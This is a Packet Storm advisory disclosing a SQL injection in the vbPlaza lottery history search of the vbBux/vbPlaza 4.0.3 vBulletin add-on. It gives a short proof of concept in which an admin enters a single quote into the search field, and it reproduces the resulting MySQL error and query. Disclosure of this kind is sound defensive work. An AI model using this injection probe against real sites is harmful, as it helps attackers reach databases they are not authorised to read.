vbBux / vbPlaza 4.0.3 SQL Injection

2013-08-11T00:00:00
ID PACKETSTORM:122774
Type packetstorm
Reporter n3tw0rk
Modified 2013-08-11T00:00:00

Description

                                        
                                            `# Exploit Title: vbBux and vbPlaza v4 SQLI  
#  
# Author(s): n3tw0rk (twiiter.com/n3tw0rkgod)  
#  
# Contact: Mail:infectedelite@gmail.com  
#  
# Product: 4.0.3 and below  
#  
# Software Version x.x.x  
#  
# Product Download:  
http://www.vbulletin.org/forum/showthread.php?t=270271#  
# Homepage: d4tabase.com  
#  
_____________________________________________________________#  
  
  
The exploit is caused due to a variable named 'vbplaza_lottery_history' not  
being sanitized before being used within an insert into statement.  
POC  
You will need Admincp Access then go to  
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the  
force read order column put a  
' into the search bar and result should show  
Database error in vBulletin 4.2.1:  
  
  
Invalid SQL:  
  
  
Database error in vBulletin 4.2.1  
  
Invalid SQL:  
  
SELECT COUNT(*) AS count  
FROM vbplaza_lottery_history  
WHERE 1=1 AND (lotteryid = ');  
  
MySQL Error : You have an error in your SQL syntax; check the manual that  
corresponds to your MySQL server version for the right syntax to use near  
'')' at line 3  
Error Number : 1064  
Request Date : Sunday, August 11th 2013 @ 05:17:53 PM  
Error Date : Sunday, August 11th 2013 @ 05:17:54 PM  
Script : http://localhost/admincp/vbplaza_lottery.php?do=findhistory  
Referrer :  
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory  
IP Address : ::1  
Username : n3tw0rk  
Classname : vB_Database  
MySQL Version : 5.5.27  
`